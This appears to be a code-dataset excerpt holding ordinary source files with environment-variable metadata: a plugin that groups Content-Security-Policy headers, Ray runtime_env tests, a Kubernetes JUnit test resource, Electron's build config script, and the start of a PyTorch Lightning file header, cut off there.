| [] | [] | ["IOT_HUB_NAME", "IOT_HUB_SAS_TOKEN"] | [] | ["IOT_HUB_NAME", "IOT_HUB_SAS_TOKEN"] | python | 2 | 0 | |
bsearch/plugins/unique_csp.py
|
import re
import os
from bsearch.plugins.base import Plugin
from bsearch.utils import base64decode
class UniqueCSP(Plugin):
CSP = 'Content-Security-Policy'
CSP_RE = re.compile('Content-Security-Policy: (.*?)\n')
NONCE_RE = re.compile("'nonce-(.*?)'")
TARGET = os.environ.get('TARGET', None)
def __init__(self):
self.unique_csps = set()
def process_item(self, item):
if self.TARGET is not None:
request = base64decode(item.request.get('#text'))
request = request[:10000]
if self.TARGET not in request:
return
response_text = item.response.get('#text')
if response_text is None:
return
response_text = base64decode(response_text)
response_text = response_text[:10000]
if self.CSP not in response_text:
return
mo = self.CSP_RE.search(response_text)
if not mo:
return
csp = mo.group(1)
if not csp:
return
csp = csp.strip()
# Remove the nonce random string in order to group the same CSP
csp = self.NONCE_RE.sub('abcdef0987654321', csp)
# Save
self.unique_csps.add(csp)
def end(self):
print('Got %s unique CSP:\n' % len(self.unique_csps))
unique_csps = list(self.unique_csps)
unique_csps.sort()
for csp in unique_csps:
print(csp + '\n')
| [] | [] | ["TARGET"] | [] | ["TARGET"] | python | 1 | 0 | |
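The key step in UniqueCSP above is normalizing the per-response nonce before de-duplicating policies. A short demonstration of that substitution on an invented header value:

import re

NONCE_RE = re.compile("'nonce-(.*?)'")

csp = "script-src 'self' 'nonce-Xy81hP2w'; object-src 'none'"
print(NONCE_RE.sub("abcdef0987654321", csp))
# script-src 'self' abcdef0987654321; object-src 'none'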
python/ray/tests/test_runtime_env.py
|
import os
import pytest
import sys
import random
import tempfile
import requests
from pathlib import Path
import ray
from ray.test_utils import (run_string_as_driver,
run_string_as_driver_nonblocking)
from ray._private.utils import (get_wheel_filename, get_master_wheel_url,
get_release_wheel_url)
import ray.experimental.internal_kv as kv
from time import sleep
driver_script = """
from time import sleep
import sys
import logging
sys.path.insert(0, "{working_dir}")
import ray
import ray.util
import os
try:
import test_module
except:
pass
try:
job_config = ray.job_config.JobConfig(
runtime_env={runtime_env}
)
if not job_config.runtime_env:
job_config=None
if os.environ.get("USE_RAY_CLIENT"):
ray.client("{address}").env({runtime_env}).namespace("").connect()
else:
ray.init(address="{address}",
job_config=job_config,
logging_level=logging.DEBUG,
namespace=""
)
except ValueError:
print("ValueError")
sys.exit(0)
except TypeError:
print("TypeError")
sys.exit(0)
except:
print("ERROR")
sys.exit(0)
if os.environ.get("EXIT_AFTER_INIT"):
sys.exit(0)
@ray.remote
def run_test():
return test_module.one()
@ray.remote
def check_file(name):
try:
with open(name) as f:
return f.read()
except:
return "FAILED"
@ray.remote
class TestActor(object):
@ray.method(num_returns=1)
def one(self):
return test_module.one()
{execute_statement}
if os.environ.get("USE_RAY_CLIENT"):
ray.util.disconnect()
else:
ray.shutdown()
sleep(10)
"""
def create_file(p):
if not p.parent.exists():
p.parent.mkdir()
with p.open("w") as f:
f.write("Test")
@pytest.fixture(scope="function")
def working_dir():
with tempfile.TemporaryDirectory() as tmp_dir:
path = Path(tmp_dir)
module_path = path / "test_module"
module_path.mkdir(parents=True)
init_file = module_path / "__init__.py"
test_file = module_path / "test.py"
with test_file.open(mode="w") as f:
f.write("""
def one():
return 1
""")
with init_file.open(mode="w") as f:
f.write("""
from test_module.test import one
""")
old_dir = os.getcwd()
os.chdir(tmp_dir)
yield tmp_dir
os.chdir(old_dir)
def start_client_server(cluster, client_mode):
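# Returns (address, extra env vars, package dir); in client mode this also starts a Ray Client server on port 10003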
from ray._private.runtime_env import PKG_DIR
if not client_mode:
return (cluster.address, {}, PKG_DIR)
ray.worker._global_node._ray_params.ray_client_server_port = "10003"
ray.worker._global_node.start_ray_client_server()
return ("localhost:10003", {"USE_RAY_CLIENT": "1"}, PKG_DIR)
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_travel():
import uuid
with tempfile.TemporaryDirectory() as tmp_dir:
dir_paths = set()
file_paths = set()
item_num = 0
excludes = []
root = Path(tmp_dir) / "test"
def construct(path, excluded=False, depth=0):
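# Recursively build a random directory tree, tracking which files and dirs end up excluded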
nonlocal item_num
path.mkdir(parents=True)
if not excluded:
dir_paths.add(str(path))
if depth > 8:
return
if item_num > 500:
return
dir_num = random.randint(0, 10)
file_num = random.randint(0, 10)
for _ in range(dir_num):
uid = str(uuid.uuid4()).split("-")[0]
dir_path = path / uid
exclud_sub = random.randint(0, 5) == 0
if not excluded and exclud_sub:
excludes.append(str(dir_path.relative_to(root)))
if not excluded:
construct(dir_path, exclud_sub or excluded, depth + 1)
item_num += 1
if item_num > 1000:
return
for _ in range(file_num):
uid = str(uuid.uuid4()).split("-")[0]
with (path / uid).open("w") as f:
v = random.randint(0, 1000)
f.write(str(v))
if not excluded:
if random.randint(0, 5) == 0:
excludes.append(
str((path / uid).relative_to(root)))
else:
file_paths.add((str(path / uid), str(v)))
item_num += 1
construct(root)
exclude_spec = ray._private.runtime_env._get_excludes(root, excludes)
visited_dir_paths = set()
visited_file_paths = set()
def handler(path):
if path.is_dir():
visited_dir_paths.add(str(path))
else:
with open(path) as f:
visited_file_paths.add((str(path), f.read()))
ray._private.runtime_env._dir_travel(root, [exclude_spec], handler)
assert file_paths == visited_file_paths
assert dir_paths == visited_dir_paths
"""
The following test cases are related with runtime env. It following these steps
1) Creating a temporary dir with fixture working_dir
2) Using a template named driver_script defined globally
3) Overwrite runtime_env and execute_statement in the template
4) Execute it as a separate driver and return the result
"""
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_empty_working_dir(ray_start_cluster_head, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
env["EXIT_AFTER_INIT"] = "1"
with tempfile.TemporaryDirectory() as working_dir:
runtime_env = f"""{{
"working_dir": r"{working_dir}",
"py_modules": [r"{working_dir}"]
}}"""
# Execute the following cmd in driver with runtime_env
execute_statement = "sys.exit(0)"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out != "ERROR"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_invalid_working_dir(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
env["EXIT_AFTER_INIT"] = "1"
runtime_env = "{ 'working_dir': 10 }"
# Execute the following cmd in driver with runtime_env
execute_statement = ""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env).strip().split()[-1]
assert out == "TypeError"
runtime_env = "{ 'py_modules': [10] }"
# Execute the following cmd in driver with runtime_env
execute_statement = ""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env).strip().split()[-1]
assert out == "TypeError"
runtime_env = f"{{ 'working_dir': os.path.join(r'{working_dir}', 'na') }}"
# Execute the following cmd in driver with runtime_env
execute_statement = ""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env).strip().split()[-1]
assert out == "ValueError"
runtime_env = f"{{ 'py_modules': [os.path.join(r'{working_dir}', 'na')] }}"
# Execute the following cmd in driver with runtime_env
execute_statement = ""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env).strip().split()[-1]
assert out == "ValueError"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_single_node(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
# Setup runtime env here
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_two_node(two_node_cluster, working_dir, client_mode):
cluster, _ = two_node_cluster
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
# Testing runtime env with working_dir
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_two_node_module(two_node_cluster, working_dir, client_mode):
cluster, _ = two_node_cluster
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
# test runtime_env with py_modules
runtime_env = """{ "py_modules": [test_module.__path__[0]] }"""
# Execute the following cmd in driver with runtime_env
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_two_node_local_file(two_node_cluster, working_dir, client_mode):
with open(os.path.join(working_dir, "test_file"), "w") as f:
f.write("1")
cluster, _ = two_node_cluster
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
# test runtime_env with working_dir
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = """
vals = ray.get([check_file.remote('test_file')] * 1000)
print(sum([int(v) for v in vals]))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_exclusion(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
working_path = Path(working_dir)
create_file(working_path / "tmp_dir" / "test_1")
create_file(working_path / "tmp_dir" / "test_2")
create_file(working_path / "tmp_dir" / "test_3")
create_file(working_path / "tmp_dir" / "sub_dir" / "test_1")
create_file(working_path / "tmp_dir" / "sub_dir" / "test_2")
create_file(working_path / "test1")
create_file(working_path / "test2")
create_file(working_path / "test3")
tmp_dir_test_3 = str((working_path / "tmp_dir" / "test_3").absolute())
runtime_env = f"""{{
"working_dir": r"{working_dir}",
}}"""
execute_statement = """
vals = ray.get([
check_file.remote('test1'),
check_file.remote('test2'),
check_file.remote('test3'),
check_file.remote(os.path.join('tmp_dir', 'test_1')),
check_file.remote(os.path.join('tmp_dir', 'test_2')),
check_file.remote(os.path.join('tmp_dir', 'test_3')),
check_file.remote(os.path.join('tmp_dir', 'sub_dir', 'test_1')),
check_file.remote(os.path.join('tmp_dir', 'sub_dir', 'test_2')),
])
print(','.join(vals))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
# Test it works before
assert out.strip().split("\n")[-1] == \
"Test,Test,Test,Test,Test,Test,Test,Test"
runtime_env = f"""{{
"working_dir": r"{working_dir}",
"excludes": [
# exclude by relative path
r"test2",
# exclude by dir
r"{str(Path("tmp_dir") / "sub_dir")}",
# exclude part of the dir
r"{str(Path("tmp_dir") / "test_1")}",
# exclude part of the dir
r"{str(Path("tmp_dir") / "test_2")}",
]
}}"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split("\n")[-1] == \
"Test,FAILED,Test,FAILED,FAILED,Test,FAILED,FAILED"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_exclusion_2(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
working_path = Path(working_dir)
def create_file(p):
if not p.parent.exists():
p.parent.mkdir(parents=True)
with p.open("w") as f:
f.write("Test")
create_file(working_path / "tmp_dir" / "test_1")
create_file(working_path / "tmp_dir" / "test_2")
create_file(working_path / "tmp_dir" / "test_3")
create_file(working_path / "tmp_dir" / "sub_dir" / "test_1")
create_file(working_path / "tmp_dir" / "sub_dir" / "test_2")
create_file(working_path / "test1")
create_file(working_path / "test2")
create_file(working_path / "test3")
create_file(working_path / "cache" / "test_1")
create_file(working_path / "tmp_dir" / "cache" / "test_1")
create_file(working_path / "another_dir" / "cache" / "test_1")
tmp_dir_test_3 = str((working_path / "tmp_dir" / "test_3").absolute())
runtime_env = f"""{{
"working_dir": r"{working_dir}",
}}"""
execute_statement = """
vals = ray.get([
check_file.remote('test1'),
check_file.remote('test2'),
check_file.remote('test3'),
check_file.remote(os.path.join('tmp_dir', 'test_1')),
check_file.remote(os.path.join('tmp_dir', 'test_2')),
check_file.remote(os.path.join('tmp_dir', 'test_3')),
check_file.remote(os.path.join('tmp_dir', 'sub_dir', 'test_1')),
check_file.remote(os.path.join('tmp_dir', 'sub_dir', 'test_2')),
check_file.remote(os.path.join("cache", "test_1")),
check_file.remote(os.path.join("tmp_dir", "cache", "test_1")),
check_file.remote(os.path.join("another_dir", "cache", "test_1")),
])
print(','.join(vals))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
# Test it works before
assert out.strip().split("\n")[-1] == \
"Test,Test,Test,Test,Test,Test,Test,Test,Test,Test,Test"
with open(f"{working_dir}/.gitignore", "w") as f:
f.write("""
# Comment
test_[12]
/test1
!/tmp_dir/sub_dir/test_1
cache/
""")
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
t = out.strip().split("\n")[-1]
assert out.strip().split("\n")[-1] == \
"FAILED,Test,Test,FAILED,FAILED,Test,Test,FAILED,FAILED,FAILED,FAILED"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_runtime_env_getter(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = """
print(ray.get_runtime_context().runtime_env["working_dir"])
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == working_dir
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_two_node_uri(two_node_cluster, working_dir, client_mode):
cluster, _ = two_node_cluster
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
import ray._private.runtime_env as runtime_env
import tempfile
with tempfile.NamedTemporaryFile(suffix="zip") as tmp_file:
pkg_name = runtime_env.get_project_package_name(working_dir, [], [])
pkg_uri = runtime_env.Protocol.PIN_GCS.value + "://" + pkg_name
runtime_env.create_project_package(working_dir, [], [], tmp_file.name)
runtime_env.push_package(pkg_uri, tmp_file.name)
runtime_env = f"""{{ "uris": ["{pkg_uri}"] }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
# pinned uri will not be deleted
print(list(kv._internal_kv_list("")))
assert len(kv._internal_kv_list("pingcs://")) == 1
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_regular_actors(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = """
test_actor = TestActor.options(name="test_actor").remote()
print(sum(ray.get([test_actor.one.remote()] * 1000)))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_detached_actors(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = """
test_actor = TestActor.options(name="test_actor", lifetime="detached").remote()
print(sum(ray.get([test_actor.one.remote()] * 1000)))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
# It's a detached actor, so it should still be there
assert len(kv._internal_kv_list("gcs://")) == 1
assert len(list(Path(PKG_DIR).iterdir())) == 2
pkg_dir = [f for f in Path(PKG_DIR).glob("*") if f.is_dir()][0]
import sys
sys.path.insert(0, str(pkg_dir))
test_actor = ray.get_actor("test_actor")
assert sum(ray.get([test_actor.one.remote()] * 1000)) == 1000
ray.kill(test_actor)
from time import sleep
sleep(5)
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_jobconfig_compatible_1(ray_start_cluster_head, working_dir):
# start job_config=None
# start job_config=something
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, True)
runtime_env = None
# Make the first driver hang so it stays running
execute_statement = """
sleep(600)
"""
script = driver_script.format(**locals())
# Have one running with job config = None
proc = run_string_as_driver_nonblocking(script, env)
# waiting it to be up
sleep(5)
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the second one, which should still work through the Ray Client server.
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
proc.kill()
proc.wait()
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_jobconfig_compatible_2(ray_start_cluster_head, working_dir):
# start job_config=something
# start job_config=None
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, True)
runtime_env = """{ "py_modules": [test_module.__path__[0]] }"""
# Make the first driver hang so it stays running
execute_statement = """
sleep(600)
"""
script = driver_script.format(**locals())
proc = run_string_as_driver_nonblocking(script, env)
sleep(5)
runtime_env = None
# Execute the following in the second driver; it should succeed.
execute_statement = "print('OK')"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "OK", out
proc.kill()
proc.wait()
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_jobconfig_compatible_3(ray_start_cluster_head, working_dir):
# start job_config=something
# start job_config=something else
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, True)
runtime_env = """{ "py_modules": [test_module.__path__[0]] }"""
# Make the first driver hang so it stays running
execute_statement = """
sleep(600)
"""
script = driver_script.format(**locals())
proc = run_string_as_driver_nonblocking(script, env)
sleep(5)
runtime_env = f"""
{{ "working_dir": test_module.__path__[0] }}""" # noqa: F541
# Execute the following cmd in the second one and ensure that
# it is able to run.
execute_statement = "print('OK')"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
proc.kill()
proc.wait()
assert out.strip().split()[-1] == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_util_without_job_config(shutdown_only):
from ray.cluster_utils import Cluster
with tempfile.TemporaryDirectory() as tmp_dir:
with (Path(tmp_dir) / "lib.py").open("w") as f:
f.write("""
def one():
return 1
""")
old_dir = os.getcwd()
os.chdir(tmp_dir)
cluster = Cluster()
cluster.add_node(num_cpus=1)
ray.init(address=cluster.address)
(address, env, PKG_DIR) = start_client_server(cluster, True)
script = f"""
import ray
import ray.util
import os
ray.util.connect("{address}", job_config=None)
@ray.remote
def run():
from lib import one
return one()
print(ray.get([run.remote()])[0])
"""
out = run_string_as_driver(script, env)
print(out)
os.chdir(old_dir)
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_init(shutdown_only):
with tempfile.TemporaryDirectory() as tmp_dir:
old_dir = os.getcwd()
os.chdir(tmp_dir)
with open("hello", "w") as f:
f.write("world")
ray.init(runtime_env={"working_dir": "."})
@ray.remote
class Test:
def test(self):
with open("hello") as f:
return f.read()
t = Test.remote()
assert ray.get(t.test.remote()) == "world"
os.chdir(old_dir)
def test_get_wheel_filename():
ray_version = "2.0.0.dev0"
for sys_platform in ["darwin", "linux", "win32"]:
for py_version in ["36", "37", "38"]:
filename = get_wheel_filename(sys_platform, ray_version,
py_version)
prefix = "https://s3-us-west-2.amazonaws.com/ray-wheels/latest/"
url = f"{prefix}{filename}"
assert requests.head(url).status_code == 200
def test_get_master_wheel_url():
ray_version = "2.0.0.dev0"
test_commit = "ba6cebe30fab6925e5b2d9e859ad064d53015246"
for sys_platform in ["darwin", "linux", "win32"]:
for py_version in ["36", "37", "38"]:
url = get_master_wheel_url(test_commit, sys_platform, ray_version,
py_version)
assert requests.head(url).status_code == 200, url
def test_get_release_wheel_url():
test_commits = {
"1.4.0rc1": "e7c7f6371a69eb727fa469e4cd6f4fbefd143b4c",
"1.3.0": "0b4b444fadcdc23226e11fef066b982175804232",
"1.2.0": "1b1a2496ca51b745c07c79fb859946d3350d471b"
}
for sys_platform in ["darwin", "linux", "win32"]:
for py_version in ["36", "37", "38"]:
for version, commit in test_commits.items():
url = get_release_wheel_url(commit, sys_platform, version,
py_version)
assert requests.head(url).status_code == 200, url
@pytest.mark.skipif(
sys.platform == "win32", reason="runtime_env unsupported on Windows.")
def test_decorator_task(ray_start_cluster_head):
@ray.remote(runtime_env={"env_vars": {"foo": "bar"}})
def f():
return os.environ.get("foo")
assert ray.get(f.remote()) == "bar"
@pytest.mark.skipif(
sys.platform == "win32", reason="runtime_env unsupported on Windows.")
def test_decorator_actor(ray_start_cluster_head):
@ray.remote(runtime_env={"env_vars": {"foo": "bar"}})
class A:
def g(self):
return os.environ.get("foo")
a = A.remote()
assert ray.get(a.g.remote()) == "bar"
@pytest.mark.skipif(
sys.platform == "win32", reason="runtime_env unsupported on Windows.")
def test_decorator_complex(shutdown_only):
ray.init(
job_config=ray.job_config.JobConfig(
runtime_env={"env_vars": {
"foo": "job"
}}))
@ray.remote
def env_from_job():
return os.environ.get("foo")
assert ray.get(env_from_job.remote()) == "job"
@ray.remote(runtime_env={"env_vars": {"foo": "task"}})
def f():
return os.environ.get("foo")
assert ray.get(f.remote()) == "task"
@ray.remote(runtime_env={"env_vars": {"foo": "actor"}})
class A:
def g(self):
return os.environ.get("foo")
a = A.remote()
assert ray.get(a.g.remote()) == "actor"
# Test that runtime_env can be overridden by specifying .options().
assert ray.get(
f.options(runtime_env={
"env_vars": {
"foo": "new"
}
}).remote()) == "new"
a = A.options(runtime_env={"env_vars": {"foo": "new2"}}).remote()
assert ray.get(a.g.remote()) == "new2"
def test_container_option_serialize():
runtime_env = {
"container": {
"image": "ray:latest",
"run_options": ["--name=test"]
}
}
job_config = ray.job_config.JobConfig(runtime_env=runtime_env)
job_config_serialized = job_config.serialize()
# job_config_serialized is JobConfig protobuf serialized string,
# job_config.runtime_env.raw_json has container_option info
# job_config.serialized_runtime_env also has container_option info
assert job_config_serialized.count(b"image") == 2
def test_working_dir_override_failure(shutdown_only):
ray.init()
@ray.remote(runtime_env={"working_dir": "."})
def f():
pass
with pytest.raises(NotImplementedError):
f.remote()
@ray.remote
def g():
pass
with pytest.raises(NotImplementedError):
g.options(runtime_env={"working_dir": "."}).remote()
@ray.remote(runtime_env={"working_dir": "."})
class A:
pass
with pytest.raises(NotImplementedError):
A.remote()
@ray.remote
class B:
pass
with pytest.raises(NotImplementedError):
B.options(runtime_env={"working_dir": "."}).remote()
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-sv", __file__]))
|
[] |
[] |
[
"USE_RAY_CLIENT",
"EXIT_AFTER_INIT",
"foo"
] |
[]
|
["USE_RAY_CLIENT", "EXIT_AFTER_INIT", "foo"]
|
python
| 3 | 0 | |
titus-common-ext/kube/src/test/java/com/netflix/titus/ext/kube/clustermembership/connector/transport/fabric8io/Fabric8IOKubeExternalResource.java
|
/*
* Copyright 2021 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.titus.ext.kube.clustermembership.connector.transport.fabric8io;
import io.fabric8.kubernetes.client.Config;
import io.fabric8.kubernetes.client.ConfigBuilder;
import io.fabric8.kubernetes.client.DefaultKubernetesClient;
import io.fabric8.kubernetes.client.NamespacedKubernetesClient;
import org.junit.rules.ExternalResource;
public class Fabric8IOKubeExternalResource extends ExternalResource {
private NamespacedKubernetesClient client;
@Override
protected void before() {
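// Use the default kubeconfig-based client unless KUBE_API_SERVER_URL points at an explicit API server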
String kubeServer = System.getenv("KUBE_API_SERVER_URL");
if (kubeServer == null) {
this.client = new DefaultKubernetesClient();
} else {
Config config = new ConfigBuilder()
.withMasterUrl(kubeServer)
.build();
this.client = new DefaultKubernetesClient(config);
}
}
@Override
protected void after() {
if (client != null) {
client.close();
}
}
public NamespacedKubernetesClient getClient() {
return client;
}
}
|
[
"\"KUBE_API_SERVER_URL\""
] |
[] |
[
"KUBE_API_SERVER_URL"
] |
[]
|
["KUBE_API_SERVER_URL"]
|
java
| 1 | 0 | |
script/lib/config.py
|
#!/usr/bin/env python
from __future__ import print_function
import errno
import os
import platform
import sys
# URL to the mips64el sysroot image.
MIPS64EL_SYSROOT_URL = 'https://github.com/electron' \
+ '/debian-sysroot-image-creator/releases/download' \
+ '/v0.5.0/debian_jessie_mips64-sysroot.tar.bz2'
# URL to the mips64el toolchain.
MIPS64EL_GCC = 'gcc-4.8.3-d197-n64-loongson'
MIPS64EL_GCC_URL = 'http://ftp.loongnix.org/toolchain/gcc/release/' \
+ MIPS64EL_GCC + '.tar.gz'
BASE_URL = os.getenv('LIBCHROMIUMCONTENT_MIRROR') or \
'https://s3.amazonaws.com/github-janky-artifacts/libchromiumcontent'
PLATFORM = {
'cygwin': 'win32',
'darwin': 'darwin',
'linux2': 'linux',
'win32': 'win32',
}[sys.platform]
verbose_mode = False
def get_platform_key():
if 'MAS_BUILD' in os.environ:
return 'mas'
else:
return PLATFORM
def get_target_arch():
arch = os.environ.get('TARGET_ARCH')
if arch is None:
return 'x64'
return arch
def get_env_var(name):
value = os.environ.get('ELECTRON_' + name, '')
if not value:
# TODO Remove ATOM_SHELL_* fallback values
value = os.environ.get('ATOM_SHELL_' + name, '')
if value:
print('Warning: Use $ELECTRON_' + name +
' instead of $ATOM_SHELL_' + name)
return value
def s3_config():
config = (get_env_var('S3_BUCKET'),
get_env_var('S3_ACCESS_KEY'),
get_env_var('S3_SECRET_KEY'))
message = ('Error: Please set the $ELECTRON_S3_BUCKET, '
'$ELECTRON_S3_ACCESS_KEY, and '
'$ELECTRON_S3_SECRET_KEY environment variables')
assert all(len(c) for c in config), message
return config
def enable_verbose_mode():
print('Running in verbose mode')
global verbose_mode
verbose_mode = True
def is_verbose_mode():
return verbose_mode
def get_zip_name(name, version, suffix=''):
arch = get_target_arch()
if arch == 'arm':
arch += 'v7l'
zip_name = '{0}-{1}-{2}-{3}'.format(name, version, get_platform_key(), arch)
if suffix:
zip_name += '-' + suffix
return zip_name + '.zip'
def build_env():
env = os.environ.copy()
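# For mips64el cross builds, expose the bundled Loongson GCC toolchain through LD_LIBRARY_PATH and PATH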
if get_target_arch() == "mips64el":
SOURCE_ROOT = os.path.abspath(os.path.dirname(
os.path.dirname(os.path.dirname(__file__))))
VENDOR_DIR = os.path.join(SOURCE_ROOT, 'vendor')
gcc_dir = os.path.join(VENDOR_DIR, MIPS64EL_GCC)
ldlib_dirs = [
gcc_dir + '/usr/x86_64-unknown-linux-gnu/mips64el-redhat-linux/lib',
gcc_dir + '/usr/lib64',
gcc_dir + '/usr/mips64el-redhat-linux/lib64',
gcc_dir + '/usr/mips64el-redhat-linux/sysroot/lib64',
gcc_dir + '/usr/mips64el-redhat-linux/sysroot/usr/lib64',
]
env['LD_LIBRARY_PATH'] = os.pathsep.join(ldlib_dirs)
env['PATH'] = os.pathsep.join([gcc_dir + '/usr/bin', env['PATH']])
return env
|
[] |
[] |
[
"LIBCHROMIUMCONTENT_MIRROR",
"TARGET_ARCH",
"ATOM_SHELL_' + nam",
"ELECTRON_' + nam"
] |
[]
|
["LIBCHROMIUMCONTENT_MIRROR", "TARGET_ARCH", "ATOM_SHELL_' + nam", "ELECTRON_' + nam"]
|
python
| 4 | 0 | |
pytorch_lightning/trainer/connectors/logger_connector/logger_connector.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
